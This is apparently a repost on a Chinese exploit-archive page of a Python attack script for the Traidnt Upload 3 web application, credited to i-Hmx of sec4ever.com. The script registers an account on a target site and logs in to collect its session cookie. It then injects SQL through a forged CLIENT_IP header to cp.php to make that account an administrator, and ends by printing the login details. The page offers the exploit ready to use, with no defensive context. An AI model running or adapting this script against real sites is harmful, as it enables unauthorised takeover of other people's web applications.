Traidnt Upload 3 Add Administrator

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Traidnt Upload 3 Add Administrator

来源：sec4ever.com 作者：i-Hmx 发布时间：2013-12-18

#!/usr/bin/python
import urllib2
import sys
print """
+-------------------------------------------+
|   Traidnt upload 3 - Admin add Exploit    |
|                  By i-Hmx                 |
|                sec4ever.com               |
|             n0p1337@gmail.com             |
+-------------------------------------------+"""
target=str(raw_input("[*] Enter Target <http://site.com/path> # "))
print "[+] Adding new user"
try:
	register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1337@gmail.com&password=sec4ever&rules=faris rules")
except:
	print "[-] Exception happened :("
	sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
headers=login.headers.items()
for header in headers:
	if header[0]=="set-cookie":
		cookies=header[1]
		if cookies.find("upload_sid")==-1:
			print "[-] Exploitation Failed"
			sys.exit()
			
print "[+] Upgrading privelages"
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n    + User : farsawy\n    + pass : sec4ever\n    + Probably you are an admin now ;)"
sys.exit()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告